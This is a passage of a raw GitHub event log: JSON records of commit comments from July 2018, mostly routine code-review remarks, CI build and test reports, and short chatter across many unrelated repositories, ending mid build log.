{"id":"7960019338","type":"CommitCommentEvent","actor":{"login":"eyal0"},"repo":{"name":"foosel/OctoPrint"},"payload":{"comment":{"id":29694790,"position":null,"line":null,"path":null,"commit_id":"d3871e34873aa55476a8173859239a1a490fa279","created_at":"2018-07-13T04:48:34Z","updated_at":"2018-07-13T04:48:34Z","author_association":"CONTRIBUTOR","body":"Slic3r plugin suffered from this, too.  Our solution:\r\n\r\n```\r\n                        if parse_version(sarge.__version__) >= parse_version('0.1.5'): # Because in version 0.1.5 the name was changed in sarge.\r\n                                async_kwarg = 'async_'\r\n                        else:\r\n                                async_kwarg = 'async'\r\n                        p = sarge.run(command, cwd=working_dir, stdout=sarge.Capture(), stderr=sarge.Capture(), **{async_kwarg: True})\r\n\r\n```"}},"created_at":"2018-07-13T04:48:34Z"}
{"id":"7960019401","type":"CommitCommentEvent","actor":{"login":"mithunshashidhara"},"repo":{"name":"lntdev/sawtooth-core"},"payload":{"comment":{"id":29694791,"position":425,"line":425,"path":"rest_api/tests/api_test/utils.py","commit_id":"4088df9911ff12a6b0bd3e610ba4477e6fba08e1","created_at":"2018-07-13T04:48:36Z","updated_at":"2018-07-13T04:48:36Z","author_association":"COLLABORATOR","body":"avoid using absolute paths"}},"created_at":"2018-07-13T04:48:36Z"}
{"id":"7960020860","type":"CommitCommentEvent","actor":{"login":"ozbillwang"},"repo":{"name":"terraform-aws-modules/terraform-aws-eks"},"payload":{"comment":{"id":29694795,"position":5,"line":67,"path":"main.tf","commit_id":"bc848058a75292e62aaad9b2470372320fd3dd79","created_at":"2018-07-13T04:49:21Z","updated_at":"2018-07-13T04:49:21Z","author_association":"CONTRIBUTOR","body":"why make it so complex? I run with below commands without any issue.\r\n\r\n    terraform-docs md . > README.md"}},"created_at":"2018-07-13T04:49:21Z"}
{"id":"7960020961","type":"CommitCommentEvent","actor":{"login":"ducnv55"},"repo":{"name":"Huandv/TwitterProject"},"payload":{"comment":{"id":29694796,"position":13,"line":13,"path":"TwitterProject/CreateTweets.swift","commit_id":"2a9d64c5027c07de0b584306790ff1d9073f221b","created_at":"2018-07-13T04:49:24Z","updated_at":"2018-07-13T04:49:24Z","author_association":"NONE","body":"tên của ViewController cũng đặt giống tên biến như a bảo htrc nhé, có đuôi là ViewController"}},"created_at":"2018-07-13T04:49:24Z"}
{"id":"7960022251","type":"CommitCommentEvent","actor":{"login":"ducnv55"},"repo":{"name":"Huandv/TwitterProject"},"payload":{"comment":{"id":29694801,"position":50,"line":50,"path":"TwitterProject/CreateTweets.swift","commit_id":"2a9d64c5027c07de0b584306790ff1d9073f221b","created_at":"2018-07-13T04:50:01Z","updated_at":"2018-07-13T04:50:01Z","author_association":"NONE","body":"self.dismiss là được"}},"created_at":"2018-07-13T04:50:01Z"}
{"id":"7960023493","type":"CommitCommentEvent","actor":{"login":"hotcoder"},"repo":{"name":"spring-projects/spring-kafka"},"payload":{"comment":{"id":29694809,"position":null,"line":null,"path":null,"commit_id":"db0516d786d044cd83237719b8e715be30c05f91","created_at":"2018-07-13T04:50:36Z","updated_at":"2018-07-13T04:50:36Z","author_association":"NONE","body":"@artembilan  @ltalhouarne  am using spring-kafka 1.0.5 RELEASE , and did not find this fix may i know which version this fix has ? and with spring-kafka 1.0.5 RELEASE , am frequently facing \r\n\r\n**_org.springframework.kafka.KafkaException Message: Interrupted while queuing ack for ConsumerRecord_**\r\n\r\ndoes this fix, solve my problem , can you please confirm "}},"created_at":"2018-07-13T04:50:36Z"}
{"id":"7960023813","type":"CommitCommentEvent","actor":{"login":"alvinj97"},"repo":{"name":"alvinj97/salary-calculation."},"payload":{"comment":{"id":29694810,"position":null,"line":null,"path":null,"commit_id":"8ee75225b87382d2902ab2ed75b5f6200c2a7508","created_at":"2018-07-13T04:50:44Z","updated_at":"2018-07-13T04:50:44Z","author_association":"OWNER","body":"just change the salary,year of service ,qualification,figures in the program.."}},"created_at":"2018-07-13T04:50:44Z"}
{"id":"7960023941","type":"CommitCommentEvent","actor":{"login":"ducnv55"},"repo":{"name":"Huandv/TwitterProject"},"payload":{"comment":{"id":29694811,"position":16,"line":16,"path":"TwitterProject/Home.swift","commit_id":"2a9d64c5027c07de0b584306790ff1d9073f221b","created_at":"2018-07-13T04:50:49Z","updated_at":"2018-07-13T04:50:49Z","author_association":"NONE","body":"tên class đặt lại nhé"}},"created_at":"2018-07-13T04:50:49Z"}
{"id":"7960024061","type":"CommitCommentEvent","actor":{"login":"ozbillwang"},"repo":{"name":"terraform-aws-modules/terraform-aws-eks"},"payload":{"comment":{"id":29694812,"position":4,"line":3,"path":"aws_auth.tf","commit_id":"bc848058a75292e62aaad9b2470372320fd3dd79","created_at":"2018-07-13T04:50:52Z","updated_at":"2018-07-13T04:50:52Z","author_association":"CONTRIBUTOR","body":"this is a break change. I need a plan that I can nominate the folder, now it became part of file name."}},"created_at":"2018-07-13T04:50:52Z"}
{"id":"7960025189","type":"CommitCommentEvent","actor":{"login":"vegeta897"},"repo":{"name":"Cowlephant/spacecowmud"},"payload":{"comment":{"id":29694813,"position":null,"line":null,"path":null,"commit_id":"5a6a1937cfda7e25e5734a80cc671f634a1d5f3c","created_at":"2018-07-13T04:51:24Z","updated_at":"2018-07-13T04:51:24Z","author_association":"NONE","body":"WHAT HAVE YOU DONE"}},"created_at":"2018-07-13T04:51:24Z"}
{"id":"7960026844","type":"CommitCommentEvent","actor":{"login":"pplutap"},"repo":{"name":"chmi3ll/agata-chmielewska-project"},"payload":{"comment":{"id":29694817,"position":18,"line":18,"path":"src/main/java/com/crud/tasks/domain/TrelloBadgesDto.java","commit_id":"32a691746ef53c6b42b8b90e841ac9ea824f2419","created_at":"2018-07-13T04:52:11Z","updated_at":"2018-07-13T04:52:11Z","author_association":"NONE","body":"Brakuje nazwy właściwości - odpowiedź się nie zmapuje"}},"created_at":"2018-07-13T04:52:11Z"}
{"id":"7960027804","type":"CommitCommentEvent","actor":{"login":"pplutap"},"repo":{"name":"chmi3ll/agata-chmielewska-project"},"payload":{"comment":{"id":29694821,"position":16,"line":16,"path":"src/main/java/com/crud/tasks/domain/TrelloAttachmentsByTypeDto.java","commit_id":"32a691746ef53c6b42b8b90e841ac9ea824f2419","created_at":"2018-07-13T04:52:37Z","updated_at":"2018-07-13T04:52:37Z","author_association":"NONE","body":"Brakuje nazwy właściwości - odpowiedź się nie zmapuje"}},"created_at":"2018-07-13T04:52:37Z"}
{"id":"7960035389","type":"CommitCommentEvent","actor":{"login":"ducnv55"},"repo":{"name":"Huandv/TwitterProject"},"payload":{"comment":{"id":29694845,"position":18,"line":18,"path":"TwitterProject/Home.swift","commit_id":"2a9d64c5027c07de0b584306790ff1d9073f221b","created_at":"2018-07-13T04:56:11Z","updated_at":"2018-07-13T04:56:11Z","author_association":"NONE","body":"em có thể viết class này kế thừa class TwitterRestApi()\r\nthì cứ thế gọi hàm getFeed() là được\r\nvà hàm getFeed() nên truyền vào URL và return về dữ liệu\r\nchứ ko nên truyền biến tableView vào nthe"}},"created_at":"2018-07-13T04:56:11Z"}
{"id":"7960044746","type":"CommitCommentEvent","actor":{"login":"JorgeMadson"},"repo":{"name":"JorgeMadson/curso-javascript-ninja"},"payload":{"comment":{"id":29694866,"position":null,"line":null,"path":null,"commit_id":"c38b928e30b4b761f2d072ade4228395c50eb51f","created_at":"2018-07-13T05:00:23Z","updated_at":"2018-07-13T05:00:23Z","author_association":"OWNER","body":"O que eu demorei pra entender é que caso o carro esteja lotado o if para e pronto, aí faz sentido não validar se a quantidade de pessoas está dentro das vagas.\r\nPq quando eu fiz só incrementava o valor se a quantidade de pessoas estivesse dentro das vagas, o que  adiciona mais uma validação."}},"created_at":"2018-07-13T05:00:23Z"}
{"id":"7960045626","type":"CommitCommentEvent","actor":{"login":"japgolly"},"repo":{"name":"japgolly/scalajs-react"},"payload":{"comment":{"id":29694868,"position":null,"line":null,"path":null,"commit_id":"6446d73464f5f4836d1af1aff5f750325f8e24f7","created_at":"2018-07-13T05:00:42Z","updated_at":"2018-07-13T05:00:42Z","author_association":"OWNER","body":"This didn't work. Not sure how I can workaround this."}},"created_at":"2018-07-13T05:00:42Z"}
{"id":"7960049161","type":"CommitCommentEvent","actor":{"login":"cuavas"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29694875,"position":6,"line":116,"path":"src/devices/machine/i8255.h","commit_id":"35dfa5372494e5f7485a0736cabf8f6e730b5dc1","created_at":"2018-07-13T05:02:14Z","updated_at":"2018-07-13T05:02:14Z","author_association":"MEMBER","body":"If these are fixed device behaviour flags, they should be `const` data members initialised in the constructor.  Provide a protected constructor that allows the values to be supplied."}},"created_at":"2018-07-13T05:02:14Z"}
{"id":"7960050717","type":"CommitCommentEvent","actor":{"login":"taroyabuki"},"repo":{"name":"yabukilab/takuma-c"},"payload":{"comment":{"id":29694877,"position":4,"line":4,"path":"ensyuu.php","commit_id":"b03a868c7a3650c4c459b845b520b99bb014fac5","created_at":"2018-07-13T05:02:55Z","updated_at":"2018-07-13T05:02:55Z","author_association":"CONTRIBUTOR","body":"<meta charset=\"UTF-8\">ですね"}},"created_at":"2018-07-13T05:02:55Z"}
{"id":"7960052023","type":"CommitCommentEvent","actor":{"login":"q5451227"},"repo":{"name":"pingfangx/iOSX"},"payload":{"comment":{"id":29694878,"position":null,"line":null,"path":null,"commit_id":"50d403c8d92abbd76670863cf4ceda3f29e070f8","created_at":"2018-07-13T05:03:26Z","updated_at":"2018-07-13T05:03:26Z","author_association":"NONE","body":"我爱你，加我QQ：63016489"}},"created_at":"2018-07-13T05:03:26Z"}
{"id":"7960053391","type":"CommitCommentEvent","actor":{"login":"chawoohong"},"repo":{"name":"summer-sb/MureokMureok"},"payload":{"comment":{"id":29694884,"position":25,"line":87,"path":"app/src/main/java/com/example/totoroto/mureok/example/example2/ExampleActivity.kt","commit_id":"7d75b147624de0d5dd69652ae1005633ad507f0d","created_at":"2018-07-13T05:04:01Z","updated_at":"2018-07-13T05:04:01Z","author_association":"COLLABORATOR","body":"상수는 대문자로 이름을 짓는게 컨벤션이며 const를 붙여주는 것이 좋습니다."}},"created_at":"2018-07-13T05:04:01Z"}
{"id":"7960054454","type":"CommitCommentEvent","actor":{"login":"timsully"},"repo":{"name":"timsully/Bootstrap"},"payload":{"comment":{"id":29694886,"position":null,"line":null,"path":null,"commit_id":"bd89fd955d6726b9f6ab3cf4e5675e8af023487c","created_at":"2018-07-13T05:04:30Z","updated_at":"2018-07-13T05:04:30Z","author_association":"OWNER","body":"Created a basic template using CDNs"}},"created_at":"2018-07-13T05:04:30Z"}
{"id":"7960054940","type":"CommitCommentEvent","actor":{"login":"cuavas"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29694888,"position":36,"line":695,"path":"src/devices/machine/i8255.cpp","commit_id":"35dfa5372494e5f7485a0736cabf8f6e730b5dc1","created_at":"2018-07-13T05:04:44Z","updated_at":"2018-07-13T05:04:44Z","author_association":"MEMBER","body":"Please be consistent with the rest of the file - the rest of the file is using `if (` and `switch (` with a space between the keyword and the opening parenthesis of the control expression.  Also, everything else in the file has spaces after commas in function calls.  Please make your base constructor call follow the format of the rest of the file."}},"created_at":"2018-07-13T05:04:44Z"}
{"id":"7960055664","type":"CommitCommentEvent","actor":{"login":"chawoohong"},"repo":{"name":"summer-sb/MureokMureok"},"payload":{"comment":{"id":29694889,"position":25,"line":87,"path":"app/src/main/java/com/example/totoroto/mureok/example/example2/ExampleActivity.kt","commit_id":"7d75b147624de0d5dd69652ae1005633ad507f0d","created_at":"2018-07-13T05:05:04Z","updated_at":"2018-07-13T05:05:04Z","author_association":"COLLABORATOR","body":"앗 const는 못붙이는군요 이름만 대문자로 지어주세요~"}},"created_at":"2018-07-13T05:05:04Z"}
{"id":"7960057040","type":"CommitCommentEvent","actor":{"login":"talweiss1982"},"repo":{"name":"ravendb/jint"},"payload":{"comment":{"id":29694892,"position":13,"line":68,"path":"Jint/Runtime/JavaScriptException.cs","commit_id":"b9c5028911e853c9eb23140ee65d82fc873c24d8","created_at":"2018-07-13T05:05:40Z","updated_at":"2018-07-13T05:05:40Z","author_association":"MEMBER","body":"Adding it only if the location is null sounds like a good solution "}},"created_at":"2018-07-13T05:05:40Z"}
{"id":"7960057456","type":"CommitCommentEvent","actor":{"login":"pplutap"},"repo":{"name":"chmi3ll/agata-chmielewska-project"},"payload":{"comment":{"id":29694893,"position":5,"line":15,"path":"src/main/java/com/crud/tasks/domain/TrelloAttachmentsByTypeDto.java","commit_id":"79891e0586e020d8b89b8ac9af35faec049e8d35","created_at":"2018-07-13T05:05:49Z","updated_at":"2018-07-13T05:05:49Z","author_association":"NONE","body":"Nazwa w jsonie to tello - bez \"s\""}},"created_at":"2018-07-13T05:05:49Z"}
{"id":"7960057728","type":"CommitCommentEvent","actor":{"login":"atvcaptain"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":29694894,"position":null,"line":null,"path":null,"commit_id":"226d1cd9258d7386fc7d20dff3a81f21a6526b99","created_at":"2018-07-13T05:05:57Z","updated_at":"2018-07-13T05:05:57Z","author_association":"MEMBER","body":"i test here with gigablue gb7252  kernel 4.1.20 "}},"created_at":"2018-07-13T05:05:57Z"}
{"id":"7960059359","type":"CommitCommentEvent","actor":{"login":"chawoohong"},"repo":{"name":"summer-sb/MureokMureok"},"payload":{"comment":{"id":29694900,"position":33,"line":94,"path":"app/src/main/java/com/example/totoroto/mureok/example/example2/ExampleActivity.kt","commit_id":"7d75b147624de0d5dd69652ae1005633ad507f0d","created_at":"2018-07-13T05:06:39Z","updated_at":"2018-07-13T05:06:39Z","author_association":"COLLABORATOR","body":"non null이어도 될 것 같네요~"}},"created_at":"2018-07-13T05:06:39Z"}
{"id":"7960061027","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":29694911,"position":4,"line":85,"path":"android/src/com/frostwire/android/offers/PrebidManager.java","commit_id":"33cf7cdff2349eeb870ccdfb58951bf34a30101e","created_at":"2018-07-13T05:07:21Z","updated_at":"2018-07-13T05:07:21Z","author_association":"COLLABORATOR","body":"interesting."}},"created_at":"2018-07-13T05:07:21Z"}
{"id":"7960061860","type":"CommitCommentEvent","actor":{"login":"nickersk"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":29694917,"position":null,"line":null,"path":null,"commit_id":"226d1cd9258d7386fc7d20dff3a81f21a6526b99","created_at":"2018-07-13T05:07:42Z","updated_at":"2018-07-13T05:07:42Z","author_association":"NONE","body":"i am trying force4 with 4.1.20. will do a patch for it (i hope) ;-)"}},"created_at":"2018-07-13T05:07:42Z"}
{"id":"7960062562","type":"CommitCommentEvent","actor":{"login":"poilynx"},"repo":{"name":"poilynx/keyboard_recorder"},"payload":{"comment":{"id":29694918,"position":null,"line":null,"path":null,"commit_id":"9f55c560ef10cadf485474127207454a5af2a3d5","created_at":"2018-07-13T05:08:02Z","updated_at":"2018-07-13T05:08:02Z","author_association":"OWNER","body":"使用gcc或者vc的控制台程序直接编译即可\r\n\r\n微信：poilynx\r\n\r\n________________________________\r\nFrom: psychopath000 <notifications@github.com>\r\nSent: Wednesday, July 11, 2018 12:23:50 PM\r\nTo: poilynx/keyboard_recorder\r\nCc: poilynx; Author\r\nSubject: Re: [poilynx/keyboard_recorder] Init (9f55c56)\r\n\r\n\r\n老兄这是什么windows 32程序，是控制台还吗，我怎么试都不行的，找不到程序的入口点\r\n\r\n―\r\nYou are receiving this because you authored the thread.\r\nReply to this email directly, view it on GitHub<https://github.com/poilynx/keyboard_recorder/commit/9f55c560ef10cadf485474127207454a5af2a3d5#commitcomment-29665905>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AIgzirdQLLZQkH1DV_uZcstFVyBEleEsks5uFX3WgaJpZM4VKeDk>.\r\n"}},"created_at":"2018-07-13T05:08:02Z"}
{"id":"7960064228","type":"CommitCommentEvent","actor":{"login":"atvcaptain"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":29694924,"position":null,"line":null,"path":null,"commit_id":"226d1cd9258d7386fc7d20dff3a81f21a6526b99","created_at":"2018-07-13T05:08:42Z","updated_at":"2018-07-13T05:08:42Z","author_association":"MEMBER","body":"i hope not all kernel version show this, when yes many todo\r\n"}},"created_at":"2018-07-13T05:08:42Z"}
{"id":"7960064923","type":"CommitCommentEvent","actor":{"login":"nickersk"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":29694925,"position":null,"line":null,"path":null,"commit_id":"226d1cd9258d7386fc7d20dff3a81f21a6526b99","created_at":"2018-07-13T05:09:00Z","updated_at":"2018-07-13T05:09:00Z","author_association":"NONE","body":"will do"}},"created_at":"2018-07-13T05:09:00Z"}
{"id":"7960069985","type":"CommitCommentEvent","actor":{"login":"gwasser"},"repo":{"name":"django-helpdesk/django-helpdesk"},"payload":{"comment":{"id":29694934,"position":39,"line":410,"path":"helpdesk/views/staff.py","commit_id":"4d78bc85cabbe657b752c7700103ce98171613ca","created_at":"2018-07-13T05:11:18Z","updated_at":"2018-07-13T05:11:18Z","author_association":"MEMBER","body":"Adding `or None` seems reasonable to me as a workaround. I added it to `master` so please let me know if it fixes the problem, if so I can release a quick hotfix version. If not please file a proper issue so can better track progress. Thanks!"}},"created_at":"2018-07-13T05:11:18Z"}
{"id":"7960070901","type":"CommitCommentEvent","actor":{"login":"gausscurve"},"repo":{"name":"gausscurve/rtfm"},"payload":{"comment":{"id":29694935,"position":null,"line":null,"path":null,"commit_id":"595fc4239408cce97e49a811bef91579b1c73b05","created_at":"2018-07-13T05:11:42Z","updated_at":"2018-07-13T05:11:42Z","author_association":"OWNER","body":"I allowed myself to contact you because it was not you who told me to leave you."}},"created_at":"2018-07-13T05:11:42Z"}
{"id":"7960071703","type":"CommitCommentEvent","actor":{"login":"elliott1130"},"repo":{"name":"styfle/mma-api"},"payload":{"comment":{"id":29694937,"position":null,"line":null,"path":null,"commit_id":"10fe9b8231a2e5cc9efa97952cab133eb3e2f081","created_at":"2018-07-13T05:12:04Z","updated_at":"2018-07-13T05:12:04Z","author_association":"NONE","body":"is this all the code i need to get the data you sent me earlier?"}},"created_at":"2018-07-13T05:12:04Z"}
{"id":"7960072456","type":"CommitCommentEvent","actor":{"login":"cuavas"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29694941,"position":55,"line":139,"path":"src/devices/bus/spectrum/uspeech.cpp","commit_id":"0417252c14374dca75f5219f3cfe1d8435ca326c","created_at":"2018-07-13T05:12:21Z","updated_at":"2018-07-13T05:12:21Z","author_association":"MEMBER","body":"Whoops?"}},"created_at":"2018-07-13T05:12:21Z"}
{"id":"7960073653","type":"CommitCommentEvent","actor":{"login":"Radiergummi"},"repo":{"name":"anchorcms/anchor-cms"},"payload":{"comment":{"id":29694945,"position":4,"line":8,"path":"anchor/views/assets/js/upload-fields.js","commit_id":"04736b5ce5cd66c8850844fd84a0d530061a0f0a","created_at":"2018-07-13T05:12:52Z","updated_at":"2018-07-13T05:12:52Z","author_association":"MEMBER","body":"@daviddarnes Yes, I think it definitely would... if only I had some free time 😭 "}},"created_at":"2018-07-13T05:12:52Z"}
{"id":"7960080394","type":"CommitCommentEvent","actor":{"login":"xiaohaier66"},"repo":{"name":"xiaohaier66/Data_structure"},"payload":{"comment":{"id":29694962,"position":15,"line":15,"path":"整数最优分解Integer optimal decomposition.cpp","commit_id":"74233cce6594ba5a2b4c18e2902bba673a71ed30","created_at":"2018-07-13T05:15:43Z","updated_at":"2018-07-13T05:15:43Z","author_association":"OWNER","body":"dd"}},"created_at":"2018-07-13T05:15:43Z"}
{"id":"7960082826","type":"CommitCommentEvent","actor":{"login":"jairo141199"},"repo":{"name":"jairo141199/marketindigital"},"payload":{"comment":{"id":29694967,"position":null,"line":null,"path":null,"commit_id":"be357a988b3c446a90de71d2251dc575f090ea79","created_at":"2018-07-13T05:16:43Z","updated_at":"2018-07-13T05:16:43Z","author_association":"OWNER","body":"> ASE MARKETING\r\nPlanear no es un juego, tú empresa tampoco.\r\n\r\n"}},"created_at":"2018-07-13T05:16:43Z"}
{"id":"7960086099","type":"CommitCommentEvent","actor":{"login":"31m059"},"repo":{"name":"candirufish/Stockfish"},"payload":{"comment":{"id":29694972,"position":null,"line":null,"path":null,"commit_id":"ad5b8883142952c89eb3e68500cd5e5399950e54","created_at":"2018-07-13T05:18:06Z","updated_at":"2018-07-13T05:18:06Z","author_association":"NONE","body":"Congratulations!"}},"created_at":"2018-07-13T05:18:06Z"}
{"id":"7960086841","type":"CommitCommentEvent","actor":{"login":"mayunbaba2"},"repo":{"name":"mayunbaba2/91Android"},"payload":{"comment":{"id":29694974,"position":null,"line":null,"path":null,"commit_id":"32b8b06a751b70bfb1452971914e644f5168f0d4","created_at":"2018-07-13T05:18:24Z","updated_at":"2018-07-13T05:18:24Z","author_association":"OWNER","body":"旧版app"}},"created_at":"2018-07-13T05:18:24Z"}
{"id":"7960091804","type":"CommitCommentEvent","actor":{"login":"amandeepmittal"},"repo":{"name":"zeolearn/nodejs-text-tutorial"},"payload":{"comment":{"id":29694987,"position":41,"line":41,"path":"module1.md","commit_id":"b2d5ed1da466a52d893e1357ee581713de978b09","created_at":"2018-07-13T05:20:24Z","updated_at":"2018-07-13T05:20:24Z","author_association":"COLLABORATOR","body":"I have added an image in `images` dir under module1. It may give a clearer idea."}},"created_at":"2018-07-13T05:20:24Z"}
{"id":"7960092122","type":"CommitCommentEvent","actor":{"login":"xxholly32"},"repo":{"name":"EmptyCup20/easy-codereview"},"payload":{"comment":{"id":29694990,"position":null,"line":null,"path":null,"commit_id":"ab27f48563c63b38b77c171cb8138530b95bba07","created_at":"2018-07-13T05:20:33Z","updated_at":"2018-07-13T05:20:33Z","author_association":"NONE","body":"@huan713 @zimplexing @ziyi2 请审核代码"}},"created_at":"2018-07-13T05:20:33Z"}
{"id":"7960093064","type":"CommitCommentEvent","actor":{"login":"amandeepmittal"},"repo":{"name":"zeolearn/nodejs-text-tutorial"},"payload":{"comment":{"id":29694991,"position":56,"line":56,"path":"module1.md","commit_id":"b2d5ed1da466a52d893e1357ee581713de978b09","created_at":"2018-07-13T05:20:57Z","updated_at":"2018-07-13T05:20:57Z","author_association":"COLLABORATOR","body":"I can try."}},"created_at":"2018-07-13T05:20:57Z"}
{"id":"7960095096","type":"CommitCommentEvent","actor":{"login":"amandeepmittal"},"repo":{"name":"zeolearn/nodejs-text-tutorial"},"payload":{"comment":{"id":29695005,"position":5,"line":5,"path":"module2.md","commit_id":"b2d5ed1da466a52d893e1357ee581713de978b09","created_at":"2018-07-13T05:21:49Z","updated_at":"2018-07-13T05:21:49Z","author_association":"COLLABORATOR","body":"WIll edit it. Please note that, there might be many typos. Once all the content of the articles are ready, I will give them a final proof-read."}},"created_at":"2018-07-13T05:21:49Z"}
{"id":"7960096241","type":"CommitCommentEvent","actor":{"login":"maxice8"},"repo":{"name":"void-linux/void-packages"},"payload":{"comment":{"id":29695010,"position":14,"line":14,"path":"srcpkgs/musl-nscd/template","commit_id":"26630e01c64c92c27ebdb486d89e79d5cc920b10","created_at":"2018-07-13T05:22:17Z","updated_at":"2018-07-13T05:22:17Z","author_association":"CONTRIBUTOR","body":"case $XBPS_TARGET_MACHINE in\r\n     *-musl) ;;\r\n     * ) broken=\"only for musl arches\" ;;\r\nesac\r\n\r\nguaranteed to work regardless of arches being dropped/added to Void"}},"created_at":"2018-07-13T05:22:17Z"}
{"id":"7960118913","type":"CommitCommentEvent","actor":{"login":"Vizvezdenec"},"repo":{"name":"candirufish/Stockfish"},"payload":{"comment":{"id":29695054,"position":null,"line":null,"path":null,"commit_id":"ad5b8883142952c89eb3e68500cd5e5399950e54","created_at":"2018-07-13T05:31:29Z","updated_at":"2018-07-13T05:31:29Z","author_association":"NONE","body":"Congrats!"}},"created_at":"2018-07-13T05:31:29Z"}
{"id":"7960119049","type":"CommitCommentEvent","actor":{"login":"lifengss"},"repo":{"name":"lifengss/Enterprise-Proj"},"payload":{"comment":{"id":29695055,"position":null,"line":null,"path":null,"commit_id":"56ef286d13346ae73195d151afb647a68149c625","created_at":"2018-07-13T05:31:32Z","updated_at":"2018-07-13T05:31:32Z","author_association":"OWNER","body":"中国银行汇率热点预测项目\r\n\r\n1.合作选题\r\n2.最新版概要设计报告\r\n3.code\r\n   |--data 汇率和新闻数据 .csv格式\r\n   |--NewsSpyder 新闻爬虫\r\n   |--RatePredict 汇率热点预测文件夹，主程序入口\r\n   |  |--RatePredict_V0 大规模数据预处理，需要改写多线程\r\n   |  |--RatePredict_V1 小规模数据训练，已完成训练，需要可视化结果\r\n   |  |  |--data_set_helper.py raw data处理模块，用于从文件读取数据\r\n   |  |  |--DataBaseConnect.py 数据库远程连接，暂时不需要。\r\n   |  |  |--EMHF.hdf5 已经训练好的模型参数文件\r\n   |  |  |--GRU_model.h5 单独采用GRU对汇率预测的模型参数文件\r\n   |  |  |--model_helper.py 用于构建模型的类\r\n   |  |  |--model_plot_test.py 模型结构可视化（需调试）\r\n   |  |  |--news_rate_predict.py 预测程序主入口\r\n   |  |  |--rate.npy 汇率数据npy格式\r\n   |  |  |--Rate_present.py 结果可视化文件\r\n   |  |  |--stop_words.txt 新闻数据NLP所用停止词表\r\n   |  |  |--text_preprocess.py 文本数据预处理类\r\n   |  |  |--tf_idf.npy 文本数据独热编码numpy文件\r\n   |  |  |--y_reg.npy 模型对训练数据的预测输出\r\n   |  |  |--y_train.npy 训练数据的标签（即预测真值）\r\n   |--results 可视化结果保存路径\r\n   |--EMHF_model.jpg 模型结构图"}},"created_at":"2018-07-13T05:31:32Z"}
{"id":"7960121228","type":"CommitCommentEvent","actor":{"login":"idsb3t1"},"repo":{"name":"idsb3t1/UI-ys1int-KEEP-TC"},"payload":{"comment":{"id":29695058,"position":null,"line":null,"path":null,"commit_id":"f64b571e19ee79be82f45838c1119245884b6ba0","created_at":"2018-07-13T05:32:24Z","updated_at":"2018-07-13T05:32:24Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.stage1.bluemix.net/devops/toolchains/ee7af0c7-eb4b-4808-84ae-65a1ebf892f4?env_id=ibm%3Ays1%3Aus-south \"UI-ys1int-KEEP-TC\"): [Delivery Pipeline](https://console.stage1.bluemix.net/devops/pipelines/9602ba9a-db4c-42c8-81d1-69655e515efe?env_id=ibm%3Ays1%3Aus-south \"UI-ys1int-KEEP-TC\") deployed [UI-ys1int-KEEP-TC](https://github.com/idsb3t1/UI-ys1int-KEEP-TC/releases/tag/deploy-ibm-ys1-us-south-idsb3t2-us.ibm.com-dev-20180713-053222 \"deploy-ibm-ys1-us-south-idsb3t2-us.ibm.com-dev-20180713-053222\") to [dev](https://console.stage1.bluemix.net/apps/e0173942-fbb5-42df-a8ff-cca49f037241?env_id=ibm:ys1:us-south \"ibm:ys1:us-south:idsb3t2@us.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-13T05:32:24Z"}
{"id":"7960121807","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29695061,"position":null,"line":null,"path":null,"commit_id":"04ad2bcff201f0ac5a19d3c6b416c6a54914567e","created_at":"2018-07-13T05:32:38Z","updated_at":"2018-07-13T05:32:38Z","author_association":"NONE","body":"158913899-Add-single-sided-natural-ventilation-example-file (lgu1234) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2973 of 2974 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ERR diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: Table big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 643\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-04ad2bcff201f0ac5a19d3c6b416c6a54914567e-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-04ad2bcff201f0ac5a19d3c6b416c6a54914567e-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-13T05:32:38Z"}
{"id":"7960126440","type":"CommitCommentEvent","actor":{"login":"daid"},"repo":{"name":"daid/Fuseblaze"},"payload":{"comment":{"id":29695077,"position":null,"line":null,"path":null,"commit_id":"025330334c823fbffbc734ff7ef47b73f7eb4744","created_at":"2018-07-13T05:34:37Z","updated_at":"2018-07-13T05:34:37Z","author_association":"OWNER","body":"### TinyCI build failure:\n[make -j 3] returned [2]:\n```[  1%] Built target json11\n[ 11%] Built target box2d\n[ 11%] Built target glew\n[ 39%] Built target sp2freetype\n[ 45%] Built target lua\n[ 76%] Built target bullet\nScanning dependencies of target Fuseblaze\n[ 76%] Building CXX object CMakeFiles/Fuseblaze.dir/src/blood.cpp.o\n[ 76%] Building CXX object CMakeFiles/Fuseblaze.dir/src/editor/editor.cpp.o\n[ 76%] Building CXX object CMakeFiles/Fuseblaze.dir/src/editor/editorHandle.cpp.o\n[ 76%] Building CXX object CMakeFiles/Fuseblaze.dir/src/editor/prototype.cpp.o\n[ 77%] Building CXX object CMakeFiles/Fuseblaze.dir/src/effect.cpp.o\n[ 77%] Building CXX object CMakeFiles/Fuseblaze.dir/src/enemies/enemy.cpp.o\n[ 77%] Building CXX object CMakeFiles/Fuseblaze.dir/src/enemies/hulk.cpp.o\n[ 77%] Building CXX object CMakeFiles/Fuseblaze.dir/src/enemies/screamer.cpp.o\n[ 77%] Building CXX object 